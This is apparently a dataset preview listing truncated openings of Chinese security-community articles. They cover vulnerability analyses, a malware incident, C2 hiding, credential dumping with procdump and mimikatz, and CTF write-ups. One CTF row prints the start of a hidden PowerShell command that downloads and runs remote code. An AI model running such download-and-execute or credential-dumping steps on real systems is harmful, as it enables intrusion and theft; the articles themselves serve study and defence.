text
stringlengths
100
9.93M
category
stringclasses
11 values
# SAML存在漏洞影响多款产品 | ##### 译文声明 本文是翻译文章,文章原作者 Kelby Ludwig,文章来源:duo.com/blog 原文地址:<https://duo.com/blog/duo-finds-saml-vulnerabilities-affecting-multiple-implementations> 译文仅供参考,具体内容表达以及含义原文为准。 ## 一、前言 本文介绍了一个新的漏洞,该漏洞可以影响基于SAML的单点登录(single sign-on,SSO)系统。具备访问认证权限的攻击者可以利用这个漏洞,在不知道受害者密码的前提下,让SAML系统以受害者身份进行认证。 作为Duo Securit...
社区文章
这是内核漏洞挖掘技术系列的第七篇。 第一篇:[内核漏洞挖掘技术系列(1)——trinity](https://xz.aliyun.com/t/4760 "内核漏洞挖掘技术系列\(1\)——trinity") 第二篇:[内核漏洞挖掘技术系列(2)——bochspwn](https://xz.aliyun.com/t/4800 "内核漏洞挖掘技术系列\(2\)——bochspwn") 第三篇:[内核漏洞挖掘技术系列(3)——bochspwn-reloaded(1)](https://xz.aliyun.com/t/4921 "内核漏洞挖掘技术系列\(3\)——bochspwn-reloaded\(1\)") 第四篇:[内...
社区文章
基于某天在公司打开虚拟机,下载了一个cms准备源码审计。 火绒居然报毒了,突发其然 该系统为win7,防火墙关闭,桥接模式(一般不启动 外网访问不了),139、445端口未关闭。 火绒是最近才安装了 访问该地址发现是个域名厂商还是啥 百度搜一波 确定为WannaMine挖矿地址 发现可疑进程 根据火绒日志 svhost.exe 异常调用cmd svhost.exe 执行-k NetworkService 开启某个服务网卡? 找到病毒运行传播模块为:spoolsv.exe 病毒运行模块为:svchost.exe 目前确认是因445端口被永恒之蓝漏洞所攻击 找到spoolsv和svchost的配置文件 发现相应的IP...
社区文章
**作者:kk** **本文为作者投稿,Seebug Paper 期待你的分享,凡经采用即有礼品相送! 投稿邮箱:paper@seebug.org** 在几天前,我就收到致远OA的RCE漏洞部分详情,但是并没有引起重视。当时获得的POC部分只包括了任意文件上传的数据包,但并没有其余详情,且数据包中重要数据都被编码过了。原以为又是一次恶作剧。没想到啊。 由于漏洞本身没什么好讲的,现在让我们来看看这个POC中涉及的编码算法,看看原始的POC中的编码数据是做什么的。 首先漏洞位置在htmlofficeservlet,通过一段时间的寻找我找到了一份旧的Seeyon OA的源码: https://github.com/zhf8394288...
社区文章
# 【知识】10月10日 - 每日安全知识热点 | ##### 译文声明 本文是翻译文章,文章来源:安全客 译文仅供参考,具体内容表达以及含义原文为准。 **热点概要: CVE-2017-12617:Apache Tomcat JSP Upload Bypass / Remote Code Execution、逆向工程macOS High Sierra补充更新、用radare2逆向工程一个Gameboy ROM、Google Chrome pdfium stack-based buffer overflow vulnerability with PoC (CVE-2017-5095)** ******** ****国内热词(以下内容...
社区文章
# 【技术分享】Dlink DWR-932B路由器被爆多个安全漏洞 | ##### 译文声明 本文是翻译文章,文章来源:安全客 原文地址:<https://pierrekim.github.io/blog/2016-09-28-dlink-dwr-932b-lte-routers-vulnerabilities.html> 译文仅供参考,具体内容表达以及含义原文为准。 **前言** 根据安全研究专家的最新发现,Dlink DWR-932B路由器中存在大量的安全漏洞,包括后门、后门账号、弱WPS、以及远程代码执行漏洞等等。如果你对物联网安全方面感兴趣的话,可以选择拿这款路由器来练练手。 **漏洞概述** Dlink DWR-932B路...
社区文章
**作者:天融信阿尔法实验室 公众号:<https://mp.weixin.qq.com/s/9OtUdzoC9BHzoOxA7IES8A>** 前段时间Apache HTTP 被发现存在本地提权漏洞(CVE-2019-0211),漏洞作者在第一时间就给出了[WriteUp](https://cfreal.github.io/carpe-diem-cve-2019-0211-apache-local-root.html)和漏洞[EXP](https://github.com/cfreal/exploits/tree/master/CVE-2019-0211-apache),阿尔法实验室也对EXP进行了深入分析,在此将分析的笔记整...
社区文章
# 【技术分享】Dvmap:第一款使用代码注入的Android恶意软件 | ##### 译文声明 本文是翻译文章,文章来源:securelist.com 原文地址:<https://securelist.com/dvmap-the-first-android-malware-with-code-injection/78648/> 译文仅供参考,具体内容表达以及含义原文为准。 译者:[nstlBlueSky](http://bobao.360.cn/member/contribute?uid=1233662000) 预估稿费:180RMB 投稿方式:发送邮件至linwei#360.cn,或登陆网页版在线投稿 **前言** **** 2...
社区文章
# 12月25日安全热点 - 针对石油公司攻击/男子以网络攻击威胁公司 ##### 译文声明 本文是翻译文章 译文仅供参考,具体内容表达以及含义原文为准。 ## 资讯类 BleepingComputer的安全专家发现了CryptoMix勒索软件的新变种 <http://securityaffairs.co/wordpress/67103/malware/file-cryptomix-ransomware.html> 网络攻击开始针对沙特阿美石油公司安全系统 <http://nation.com.pk/25-Dec-2017/cyberattack-targets-safety-system-at-saudi-aramco> 男子看不...
社区文章
# 杀软的无奈-手工构建免杀的ELF文件(四) ##### 译文声明 本文是翻译文章 译文仅供参考,具体内容表达以及含义原文为准。 ## 前言 上一节我们利用模拟执行工具 unicorn 分析了 metasploit 生成的 shellcode 的执行过程和编码器 `x86/shikata_ga_nai` 的解码逻辑, 并依据 metasploit 的源代码分析了 payload 的生成过程。 从生成过程中我们也可以发现编码器的静态特征比较明显,容易被反病毒软件静态识别。为了逃避过杀毒软件的静态查杀,本文主要讲解如何实现自己的编码器进行代码编码并且手工构建ELF文件,因为ruby语言实在的不熟悉,所以本文暂时不会基于metas...
社区文章
# 【技术分享】聊聊越权那些事儿 ##### 译文声明 本文是翻译文章,文章来源:安全客 译文仅供参考,具体内容表达以及含义原文为准。 **** **作者:**[ **三思之旅**](http://bobao.360.cn/member/contribute?uid=1630860495) **稿费:300RMB(不服你也来投稿啊!)** **投稿方式:发送邮件至linwei#360.cn,或登陆**[ **网页版**](http://bobao.360.cn/contribute/index) **在线投稿** **前言** 最近在帮合作单位做渗透测试,这是我入行以来第一次参与正式项目。怀着激动而忐忑的心情测了两周,我一共发现了...
社区文章
# Nomad 跨链桥被盗1.8亿美元事件分析 ##### 译文声明 本文是翻译文章 译文仅供参考,具体内容表达以及含义原文为准。 ## 0x1 事件背景 零时科技区块链安全情报平台监控消息,北京时间2022年8月2日,跨链解决方案 Nomad 遭到黑客攻击。WETH、WBTC、USDC 以每次百万美元的频次转出,合约中仍有 1.26 亿美元可能存在风险。零时科技安全团队及时对此安全事件进行分析。 ## 0x2 攻击信息 * **部分攻击交易** 0x96a2cfadb19cac9ba2a21c1f32b6f21b6132afe1b4f4698dee563ca01ec20e01 转移 USDC 0x811a54270e38154...
社区文章
简介 可靠且免费的网络扫描器可以分析 LAN。该程序可扫描所有网络设备,使您能够访问共享文件夹和 FTP 服务器,(通过 RDP 和 Radmin)远程控制计算机,甚至还能够远程关闭计算机。该程序不仅易于使用,而且运行起来如同便携版一般轻松。它是每个网络管理员的首选程序。 主要特性 轻松访问网络共享资源通过 RDP 和 Radmin 对计算机进行远程控制MAC 地址检测远程启动/关闭计算机导出为 CSV无需安装兼容Windows 10 使用 Advanced IP Scanner 一、网络扫描 1. 输入所需的 IP 地址范围(工具栏中的“IP”按钮将帮助您设置网络 IP 地址范围)。 2. 单击“扫...
社区文章
作者:[绿盟科技 & 中国电信安全帮](http://www.nsfocus.com.cn/content/details_62_2646.html "绿盟科技") 在“互联网 +”时代,物联网发展迅猛,正加速渗透到生产、消费和社会管理等各领域,物联网设备规模呈现爆发性增长趋势,万物互联时代正在到来。 物联网是继计算机、互联网之后的又一新的信息科学技术,目前,世界主要国家已将物联网作为抢占新一轮经济科技发展制高点的重大战略,我国也将物联网作为战略性新兴产业,在 2016 年国家“十三五”规划指出:要积极推进物联网发展,推进物联网感知设施规划布局,发展物联网开环应用,加快物联网基础设施建设和应用推广已经上升到了国家战略层面。 然而在物...
社区文章
# Hadoop Yarn REST API未授权漏洞利用挖矿分析 ##### 译文声明 本文是翻译文章 译文仅供参考,具体内容表达以及含义原文为准。 Fooying@云鼎实验室 2018/05/30 ## 一、 背景 5月5日腾讯云安全曾针对“攻击者利用Hadoop Yarn资源管理系统REST API未授权漏洞对服务器进行攻击,攻击者可以在未授权的情况下远程执行代码”的安全问题进行预警,在预警的前后我们曾多次捕获相关的攻击案例,其中就包含利用该问题进行挖矿,我们针对其中一个案例进行分析并提供响应的安全建议和解决方案。 ## 二、 漏洞说明 Hadoop是一个由Apache基金会所开发的分布式系统基础架构,YARN是hadoop系...
社区文章
## WatchAD攻防实战 WatchAD是0KEE Team研发的开源域安全入侵感知系统,WatchAD收集所有域控上的事件日志和kerberos流量,通过特征匹配、Kerberos协议分析、历史行为、敏感操作和蜜罐账户等方式来检测各种已知与未知威胁,功能覆盖了大部分目前的常见内网域渗透手法。目前支持的具体检测功能如下: 系统架构如下: WatchAD包括Server端、WatchAD agent和前Web前端,同时需要准备域环境,在域控中安装winlogbeat实现域控日志发送至WatchAD Server端进行检测,安装部署比较复杂,下面通过实战进行详细介绍。本次实战环境如下: WatchAD Server:Centos...
社区文章
# 【技术分享】深入剖析:利用Flash漏洞传播的小马样本分析(含样本下载) | ##### 译文声明 本文是翻译文章,文章来源:安全客 译文仅供参考,具体内容表达以及含义原文为准。 **** 作者:[playb0y23333](http://bobao.360.cn/member/contribute?uid=2762195961) 预估稿费:300RMB 投稿方式:发送邮件至linwei#360.cn,或登陆网页版在线投稿 **前言** 这是一个利用Flash漏洞 **CVE-2015-8651** 进行传播的病毒程序,关于这个Flash漏洞网上已经有了详细的分析报告,这里主要关注下利用这个漏洞进行传播的样本行为、通信加密方式等...
社区文章
# 【知识】11月13日 - 每日安全知识热点 | ##### 译文声明 本文是翻译文章,文章来源:安全客 译文仅供参考,具体内容表达以及含义原文为准。 **热点概要: 穆斯林黑客攻击ISIS网站,公布2万名订阅者名单、卡巴斯基发布2017 Q3网络威胁的发展情况、PayPal子域存储型XSS、对Ordinypt恶意软件的分析报告、ARM虚拟机环境搭建教程(含虚拟机下载)、对垃圾邮件僵尸网络一探究竟、使用自动执行的宏或DDE生成并“感染”现有的Excel文件、Hijacking Digital Signatures ****** **资讯类:** **** 穆斯林黑客攻击ISIS网站,公布2万名订阅者名单 <https://www....
社区文章
# 热门黑产工具分析01:利用集鞋卡活动进行牟利的“追鞋人” ##### 译文声明 本文是翻译文章 译文仅供参考,具体内容表达以及含义原文为准。 ^ ## 事件描述 某金融应用为拉动用户增长,推出了”集鞋卡换潮鞋”活动,用户通过参加活动,完成活动任务获得“鞋卡”。用户集齐鞋卡之后,可选择自己喜好的潮鞋进行兑换。但是由于活动方在不同时间放出的潮鞋种类及数量有限,并且部分价值相对较高的潮鞋需求量大,所以需要以“抢购”的方式去兑换潮鞋。在活动上线不久后,永安在线业务风险感知平台发现了针对该活动的工具,该工具可自动化完成兑换潮鞋的过程。 在某网赚平台对该活动的介绍 应用内截图 ## 薅羊毛逻辑 利用大量账号领取鞋卡,并在匹配广场进行一定的卡...
社区文章
#### 前言 某天挖完洞闲来无事浏览CNVD看到某CMS更新了一溜的SQL注入,似乎起了强迫症,于是准备分析学习记录一下,顺便填充一下工作内容(哈哈题外话请忽略),其实是个小众CMS,分析起来也不算难,后台的比较简单,主要看前台的。 版本:2.0.2 PS:官方已跟新至了最新版本,且在最新版修复了以下漏洞。该文仅作学习和交流。 #### SQL注入1-后台de***.php 对应CNVD编号:CNVD-2020-12871 漏洞出现在在后台文件de`***.php中,`de`***_add`函数对GET和POST参数先进行了是否empty判断,最终将传入的几个参数传给了edit_admin_department。 跟入edit...
社区文章
### 一、前言 前几天全国大学生信息安全竞赛初赛如期进行,在这次比赛中也看到了区块链题目的身影。所以我将题目拿来进行分析,并为后续的比赛赛题提供一些分析思路。 由于本次比赛我并没有参加,所以我并没有Flag等相关信息,但是我拿到了比赛中的相关文件以及合约地址并在此基础上进行的详细分析,希望能帮助到进行研究的同学。 ### 二、题目分析 拿到题目后,我们只得到了两个内容,一个是合约的地址,一个是`broken.so`。 pragma solidity ^0.4.24; contract DaysBank { mapping(address => uint) public balanceOf; ...
社区文章
**作者:R17a 本文为作者投稿,Seebug Paper 期待你的分享,凡经采用即有礼品相送! 投稿邮箱:paper@seebug.org** ## 0x00 前言 最近一直在Java相关漏洞进行分析学习,调试环境就是第一步需要准备的,所以总结一下,也是为跟我一样想要接触漏洞调试分析的萌新提供一些参考吧。 文笔粗糙,如有不当,请大佬批评指正。 ## 0x01 调试基本方法 ### 调试环境 * Intelli IDEA 2019.2.4 * Windows10 关于IDEA的安装破解这里就不说了,网上大把文章可以参考。 ### IDEA的调试基本用法 如上图,我们挨个简单介绍下这些按钮和区域,如果想要更多详细信息...
社区文章
**作者:Longofo@知道创宇404实验室** **时间:2019年4月26日** Oracle发布了4月份的补丁,详情见链接(<https://www.oracle.com/technetwork/security-advisory/cpuapr2019-5072813.html#AppendixFMW>) @xxlegend在[《Weblogic CVE-2019-2647等相关XXE漏洞分析》](https://paper.seebug.org/900/ "《Weblogic CVE-2019-2647等相关XXE漏洞分析》")分析了其中的一个XXE漏洞点,并给出了PoC。刚入手java不久,本着学习的目的,自己尝试分...
社区文章
# 摘要 Apache Tomcat在其SSI实现中存在漏洞,可用于实现跨站点脚本(XSS)。只有在启用SSI并使用“printenv”指令的情况下,才能利用此漏洞。 供应商对这个漏洞的评级为低风险性,且在版本7.0.94、8.5.40和9.0.19中发布了补丁,用户应尽快升级到最新版本。 # 漏洞详细信息 服务器端包含(SSI)是一些Web服务器中使用的一种简单的脚本语言,用于实现包括文件、变量的值回显和显示有关文件的基本信息等功能。这些只是针对于SSI特定的环境变量,它们要么由用户设置,要么包含关于传入HTTP请求的信息。(请参阅此处的[完整列表](https://tomcat.apache.org/tomcat-9.0-d...
社区文章
# 安卓调试桥ADB ##### 译文声明 本文是翻译文章 译文仅供参考,具体内容表达以及含义原文为准。 ## ADB简介 adb的全称为Android Debug Bridge,起到调试桥的作用,是连接Android手机与PC端的桥梁,方便我们在电脑上对手机进行操作。 adb采用socket TCP 5554等端口的方式让IDE和Qemu通讯,借助adb工具我们可以管理设备或手机模拟器的状态,还可以进行很多手机的操作如安装软件、系统升级、运行shell命令等。 adb的使用需要安装Android sdk环境,并把“platform-tools”目录添加到系统环境变量中直接打开cmd即可使用adb命令。 ## ADB主要的功能 AD...
社区文章
之前分析过一个ToaruOS 操作系统提权的漏洞,感觉十分有意思,这里在分析一个利用ToaruOS llinker + sudo提权的漏洞 ## 0x1 __attribute__介绍 __attribute__可以设置函数属性(Function Attribute)、变量属性(Variable Attribute)和类型属性(Type Attribute)。__attribute__前后都有两个下划线,并且后面会紧跟一对原括弧,括弧里面是相应的__attribute 参数 __attribute__语法格式为:__attribute ( ( attribute-list ) ) 若函数被设定为constructor属性,则该函数会...
社区文章
# Social-Engineer Toolkit **在Kali Linux中使用SET工具包进行网站克隆** SET工具包:Social-Engineer Toolkit专门用于社会工程的高级攻击包。SET通过<https://www.social-engineer.org/> 发布更新,并迅速成为渗透测试人员库中的标准工具。SET由David Kennedy(ReL1K)编写,并在社区人员的大量帮助下,它包含了以前从未见过的攻击工具集。渗透测试期间,工具包中内置的攻击工具可以进行有针对性地集中攻击。 **第1步:检查您的IP地址(Kali Linux)** **步骤2:检查网络中的所有计算机** 命令:Netdis...
社区文章
# 通达oa11.7 漏洞整理及复现 | ##### 译文声明 本文是翻译文章 译文仅供参考,具体内容表达以及含义原文为准。 ## 环境安装 下载链接: <https://cdndown.tongda2000.com/oa/2019/TDOA11.7.exe> windows server 2008直接安装有bug windows server 2012直接双击安装就完事了 2012装vmwaretools 不好使 最后还是用python -m http.server搭服务器下载的 修复vmwaretools: <https://blog.csdn.net/fly_hps/article/details/104300665> 装好o...
社区文章
# LethalHTA 一种结合DCOM和HTA的新型横向渗透技术 | ##### 译文声明 本文是翻译文章,文章来源:codewhitesec.blogspot.com 原文地址:<https://codewhitesec.blogspot.com/2018/07/> 译文仅供参考,具体内容表达以及含义原文为准。 本篇文章,主要介绍了一种新型的横向渗透手法,它把DOCM和HTA两者结合起来,实现有效的隐蔽攻击。对于这个技术,来自我们最近研究成果的一部分,具体可以参考: [Marshalling to SYSTEM – An analysis of CVE-2018-0824](https://codewhitesec.blogsp...
社区文章
# how2heap之开篇 ##### 译文声明 本文是翻译文章 译文仅供参考,具体内容表达以及含义原文为准。 > 欢迎各位喜欢安全的小伙伴们加入星盟安全 UVEgZ3JvdXA6IDU3MDI5NTQ2MQ== > > how2heap系列几个月前更新了!!!!大事件,正好寒假时间充裕,不如把how2heap总结一遍算了,千万别咕咕咕了hhh PS:由于本人才疏学浅,文中可能会有一些理解的不对的地方,欢迎各位斧正 🙂 ## 参考网站 https://ctf-wiki.github.io/ctf-wiki/pwn https://blog.csdn.net/liying_1234/article/details/...
社区文章
作者:进德修业行道@深蓝实验室 # 前言 网络安全技术学习,承认⾃⼰的弱点不是丑事。只有对原理了然于⼼,才能突破更多的限制。拥有快速学习能力的白帽子,是不能有短板的,有的只能是大量的标准板和几块长板。知识⾯,决定看到的攻击⾯有多⼴;知识链,决定发动的杀伤链有多深。 # 一、漏洞原理 * CVE-2021-42278,机器账户的名字一般来说应该以`$`结尾,但AD没有对域内机器账户名做验证。 * CVE-2021-42287,与上述漏洞配合使用,创建与DC机器账户名字相同的机器账户(不以$结尾),账户请求一个TGT后,更名账户,然后通过S4U2self申请TGS Ticket,接着DC在`TGS_REP`阶段,这个账户不存在的...
社区文章
# Union CTF 2021 nutty 内核漏洞题目 | ##### 译文声明 本文是翻译文章 译文仅供参考,具体内容表达以及含义原文为准。 ## 0x0 保护 #!/bin/sh qemu-system-x86_64 \ -m 512M \ -kernel bzImage \ -nographic \ -smp 1 \ -cpu kvm64,+smep,+smap \ -append "console=ttyS0 quiet kaslr" \ -initrd rootfs.cpio \ ...
社区文章
# Win10及2012系统以后的明文抓取方式 ##### 译文声明 本文是翻译文章 译文仅供参考,具体内容表达以及含义原文为准。 ## 1\. procdump+mimikatz获取win10/win2012 R2用户明文密码 测试环境:win10企业版和win2012 R2 版本 工具下载:链接:https://pan.baidu.com/s/1gNc9qLcNSNBohIVrAiqShw 密码:fc38 原理:获取到内存文件lsass.exe进程(它用于本地安全和登陆策略)中存储的明文登录密码 利用前提:拿到了admin权限的cmd,管理员用密码登录机器,并运行了lsass.exe进程,把密码保存在内存文件lsass进程中。...
社区文章
无意翻到b1ue大佬挖 fastjson 的拒绝服务漏洞的文章,于是跟了一下漏洞原理和触发流程,按照自己的理解简单地从结果出发开始分析。 以下复现均是在1.2.62,漏洞影响范围 1.2.36~1.2.62 ## 漏洞缘由 首先要说明的这是一个正则DOS引起的拒绝服务,最根本的原理如下 String p = "^[a-zA-Z]+(([a-zA-Z ])?[a-zA-Z]*)*$"; String strPropertyValue = "aaaaaaaaaaaaaaaaaaaaaaaaaaaa!"; Pattern pattern = Pattern.compile(p); Matcher m = p...
社区文章
挖出来之后看了下官网发现不到半个月之前更新了最新版,下下来之后发现这洞修了..我吐了 干脆直接发出来 分享下思路吧 ## 0x00漏洞分析 漏洞发生在PbootCMS内核的模板解析函数中 为了方便看直接上一个完整的Parser代码吧 public function parser($file) { // 设置主题 $theme = isset($this->vars['theme']) ? $this->vars['theme'] : 'default'; //file形式:xxxxx/../../../可以双写穿越 ...
社区文章
# 浅析Java序列化和反序列化 ##### 译文声明 本文是翻译文章,文章原作者 gyyyy,文章来源:github.com 原文地址:<https://github.com/gyyyy/footprint/blob/master/articles/2019/about-java-serialization-and-deserialization.md> 译文仅供参考,具体内容表达以及含义原文为准。 ## 序列化机制 序列化 _(Serialization)_ 是指将数据结构或对象状态转换成字节流 _(例如存储成文件、内存缓冲,或经由网络传输)_ ,以留待后续在相同或另一台计算机环境中,能够恢复对象原来状态的过程。序列化机制在Ja...
社区文章
# Joomla 3.2 到 3.4.4 注入漏洞允许管理员权限访问站点 | ##### 译文声明 本文是翻译文章,文章来源:360安全播报 原文地址:<https://www.trustwave.com/Resources/SpiderLabs-Blog/Joomla-SQL-Injection-Vulnerability-Exploit-Results-in-Full-Administrative-Access/> 译文仅供参考,具体内容表达以及含义原文为准。 **受影响版本:3.2 到 3.4.4** **补救措施:** 如果你正在使用低版本的joomla,请立即去官方更新到最新版<https://github.com/joo...
社区文章
本文翻译自:ZLAB恶意软件分析报告《HeroRAT: Analyzing the Telegram based Android malware》 <http://csecybsec.com/download/zlab/20180802_CSE_HeroRAT.pdf> * * * 2018年6月, ESET的安全研究人员发现了一个安卓远程管理工具(Remote Administration Tool,RAT)家族——HeroRAT,HeroRAT 通过Telegram BOT API与攻击者进行通信。使用Telegram API已经成为Android RAT威胁场景的一种新趋势,HeroRAT之前已经有TeleRAT、IRRAT等...
社区文章
# 路由器漏洞挖掘之栈溢出入门(一) ##### 译文声明 本文是翻译文章 译文仅供参考,具体内容表达以及含义原文为准。 ## 前言 MIPS 指令集主要使用在一些嵌入式的 IOT 设备中,比如路由器,摄像头。要对这些设备进行二进制的漏洞挖掘就需要有对 MIPS 有一定的熟悉。MIPS 指令集的栈溢出与 x86 指令集的有所不同,所以漏洞的利用方式也不太相同,但是溢出的思路是一样的:覆盖返回地址、劫持程序控制流、构造 ROP chain 、写 shellcode 等等。本文介绍一下最基本的 MIPS 指令集下的栈溢出的利用方法。 ## x86 和 MIPS 指令集的差异 1.MIPS 指令系统大量使用寄存器,包括返回地址也是存放在...
社区文章
## 〇、前言 xxx是一款用于前端防御自动化工具的安全网关,核心代码由服务器下发给客户端执行,通过cookie将执行结果带回,再根据js获取的前端数据判断用户是否异常,完成安全检测 ## 一、代码入口 js计算结果通过cookie传给服务器,参数名为:8PHkpr8y、JF7cGtR5、SflKxwRJ 经过调试分析,代码明文存放在`ng_dynamic_defend`文件中,核心逻辑位于尾部这几行 ## 二、读取配置 `get_global()`函数读取配置信息,放入`_global_config`中 window.config = 'eyJmaW5nZXIiOnsibmFtZSI6IkpGN2NHdFI1In0sImJ...
社区文章
# MyKings: 一个大规模多重僵尸网络 ##### 译文声明 本文是翻译文章,文章原作者 netlab.360.com,文章来源:netlab.360.com 原文地址:<http://blog.netlab.360.com/mykings-the-botnet-behind-multiple-active-spreading-botnets/> 译文仅供参考,具体内容表达以及含义原文为准。
社区文章
注:本文为“小米安全中心”原创,转载请联系“小米安全中心”:<https://sec.xiaomi.com/> 1.指纹识别 指纹识别是扫描器的雷达卫星,能在真正需要的时候准确命中目标,指纹识别不仅仅包括Web服务器,还包括设备资产的指纹,一个IP对应的是一台服务器还是一台个人机还是一台打印机?这意味着安全域是不同的,攻下他需要的武器更是不一样。 Web框架指纹扫描在大型甲方公司其实需求并不是非常迫切,成型的框架比如WordPress,Drupal,Joomla!,Discuz! 等使用并不多,多是官方论坛,某个部门的对外Blog之类,多数是进行了二次开发,这里以WordPress举例指纹扫描: * 使用Whatweb集群进行W...
社区文章
# 红队攻防基础建设—C2 IP隐匿技术 ##### 译文声明 本文是翻译文章 译文仅供参考,具体内容表达以及含义原文为准。 ## 前记 随着HW的开始,蓝队弟弟们见识到了很多奇特的操作,本文主要从监测溯源时比较常见的一些红队的隐匿手法进行讲解。在实际攻防中有效的隐匿我们的C2主机也是很必要的,在工作的同时发现很多蓝队对此并不熟悉,所以本文会深入浅出的讲解三种常见的方式,希望通过本文能够对各位有所帮助。 ## 域前置 域前置技术就是通过CDN节点将流量转发到真实的C2服务器,其中CDN节点ip通过识别请求的Host头进行流量转发。这里作者利用阿里云全站加速CDN实现任意HOST头修改,利用构造高信誉域名,从而实现绕过流量分析。 #...
社区文章
### **0x01 前言** ThinkPHP框架是当前国内最流行的PHP框架之一,虽然TP3.2.3这个版本和国外的开源框架还是有一定距离,但是人家教程多,用户量多,中文文档写得奇的优点,现在工作的公司用的是thinkphp3.2框架进行开发,TP框架为我们开发者提供了底层的安全过滤功能,所以我在使用TP框架开发的时候并没有很仔细的去想过安全的问题,而最近也是挤出了一点时间,想知道TP框架底层是如何运作的,底层是如何防注入的,看了一下文档,看了一下源码,找了一些资料,整理出了一些TP框架运行的原理。 ### 0x02 简介 通读源码的话,当然要从下载源码开始 : ) 下载地址:<http://www.thinkphp.cn/do...
社区文章
# N1CTF2020 Pentest King of phish | ##### 译文声明 本文是翻译文章 译文仅供参考,具体内容表达以及含义原文为准。 ## 前言: N1CTF2020中的几道域题目考点很好,拿来和师傅们分享下,希望能给师傅们一点帮助 ## The King Of Phish (Victim Bot) lnk命令执行,测试后发现携带参数不能超过一个`可以把空格替换成tab就执行了,cs起一个web C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -nop -w hidden -c "IEX ((new-object net.webclie...
社区文章
# 【技术分享】2016年密码学的技术发展回顾 | ##### 译文声明 本文是翻译文章,文章来源:eff.org 原文地址:<https://www.eff.org/deeplinks/2016/12/what-happened-crypto-2016> 译文仅供参考,具体内容表达以及含义原文为准。 **翻译:**[ **WisFree** ****](http://bobao.360.cn/member/contribute?uid=2606963099) **预估稿费:200RMB(不服你也来投稿啊!)** ******投稿方式:发送邮件至**[ **linwei#360.cn**](mailto:linwei@360.cn)...
社区文章
# 【技术分享】Java反序列化漏洞从理解到实践 | ##### 译文声明 本文是翻译文章,文章来源:diablohorn.com 原文地址:<https://diablohorn.com/2017/09/09/understanding-practicing-java-deserialization-exploits/> 译文仅供参考,具体内容表达以及含义原文为准。 译者:[興趣使然的小胃](http://bobao.360.cn/member/contribute?uid=2819002922) 预估稿费:200RMB 投稿方式:发送邮件至linwei#360.cn,或登陆网页版在线投稿 **一、前言** 在学习新事物时,我们需...
社区文章
<div><span style="background-color:none;"><span style="font-family:微软雅黑, " "="">亲爱的白帽子们:</span></div><div><span style="background-color:none;"><span style="font-family:微软雅黑, " "="">为了进一步激发各位的挖洞热情,先知(安全情报)12月“月度排行榜”活动继续进行,TOP10的安全专家将获得阿里提供的现金奖励。具体活动规则如下:</span></div><div> </div><div><span style="background-color:none;">...
社区文章
# 案例分享:Location 302跳转 + CRLF 场景下如何构造XSS ## 1\. 译文声明 **本文是翻译文章,原作者 quentin 原文地址:<https://www.gremwell.com/firefox-xss-302> 译文仅作参考,具体内容表达请见原文 ** ## 2\. 初步发现 最近日站时遇到了一个URL跳转,服务器直接将目标GET参数原样输出在`Location:`响应头中没做任何安全检查。如下: 随后我发现该输出点还解析换行符和回车符,也就是存在CRLF: 然后我插入了多个换行符之后再插入一下HTML+JS语法,想借此构造反射XSS: 但是问题来了,由于响应码是`302`,常用的浏览器如Ch...
社区文章
## 基于反序列化的Oracle提权 * * * 本文翻译自:<http://obtruse.syfrtext.com/2018/07/oracle-privilege-escalation-via.html?m=1> * * * ### TLDR: Oracle数据库容易受到通过java反序列化向量绕过Oracle JVM内置的安全机制来提升用户权限的影响。攻击者适当的利用它还可以获取服务器上的shell级访问权限和对数据库的访问的SYS级别权限。 Oracle 针对此问题发布了CVE-2018-3004。 ### 反序列化漏洞 Java反序列化漏洞在过去几年中风靡一时。2015年,Foxglove安全发布了[一篇文章](http...
社区文章
# 【技术分享】Powershell Empire 绕过AV实现远控 ##### 译文声明 本文是翻译文章,文章来源:安全客 译文仅供参考,具体内容表达以及含义原文为准。 作者:[C1em0](http://bobao.360.cn/member/contribute?uid=2972639568) 预估稿费:500RMB 投稿方式:发送邮件至linwei#360.cn,或登陆网页版在线投稿 **1\. 前言** 谁都喜欢框架。无论对于是平时出于各种目的游走在网页和服务器中的黑客,还是从事网络安全测试的安全人员来说,一个好的漏洞框架发挥的作用不言而喻。这其中的Metasploit脱颖而出。虽然这款框架集成了从漏洞发现到漏洞利用的几...
社区文章
# Chrome issue 762874 ##### 译文声明 本文是翻译文章 译文仅供参考,具体内容表达以及含义原文为准。 ## 0 环境与背景知识 ### 0.1 环境 首先搜一下在chrome的bug库中找到对应的issue号 从下面的评论中找到了对应的含有漏洞的v8版本 还原到parent版本 下图中的两个版本应该是都可以的(对于旧的版本可以使用JIT 新的v8版本可以使用wasm方法)这里的新指6.7版本之后的)当然了使用传统的[泄漏libc方法](https://migraine-sudo.github.io/2020/02/22/roll-a-v8/#%E6%B3%84%E9%9C%B2libc)也可以 ### ...
社区文章
# Adobe Acrobat OCG setIntent 整数溢出及补丁绕过分析 | ##### 译文声明 本文是翻译文章,文章来源:https://www.zerodayinitiative.com/ 原文地址:<https://www.zerodayinitiative.com/blog/2018/5/29/malicious-intent-using-adobe-acrobats-ocg-setintent> 译文仅供参考,具体内容表达以及含义原文为准。 ## 介绍 在过去的几年中,我们看到了关于Adobe的漏洞数量激增,可见Adobe Acrobat和Reader拥有相当大的关注度。虽然大多数这些漏洞都是些简单的文件分析问...
社区文章
密码学只做出来两题 baby, 暗示我还是学密码学的 baby (逃 ## baby_crypto 这题还算比较常规, 主要逻辑如下 while True: try: print("Input your cookie:") data_hex = sys.stdin.readline().strip() data = binascii.unhexlify(data_hex) assert(len(data) > iv_len + hash_len) iv, cookie_padded_encr...
社区文章
随着网络攻防的进一步演进,网络犯罪分子也学到了很多,不断开发出新的更具创造性的恶意软件。研究人员发现最近的垃圾邮件攻击活动中出现了一些之前很少用到的文件类型。 2017年的年度报告中研究人员发现恶意软件相关的垃圾邮件活动中最常用的文件类型是`.XLS, .PDF, .JS, .VBS, .DOCX, .DOC, .WSF, .XLSX, .EXE,.HTML`。今年,网络犯罪分子扩展了一些新的文件格式,下面一一进行讲解。 # .ARJ和.Z文件 ARJ表示Archived by Robert Jung,是上世纪90年代的一款高效率档案压缩工具,只支援Intel的16-bit与32-bit的CPU。2014年,ARJ文件扩展格式出现在...
社区文章
### **前言** 前段时间在做然之协同系统代码审计,这里做个简单的总结。 ### **第一弹:SQL注入漏洞** #### 0x01 注入漏洞分析 问题出现在/lib/base/dao/dao.class.php文件中的orderBy函数中, public function orderBy($order) { if($this->inCondition and !$this->conditionIsTrue) return $this; $order = str_replace(array('|', '', '_'), ' ', $order); /* Add "`...
社区文章
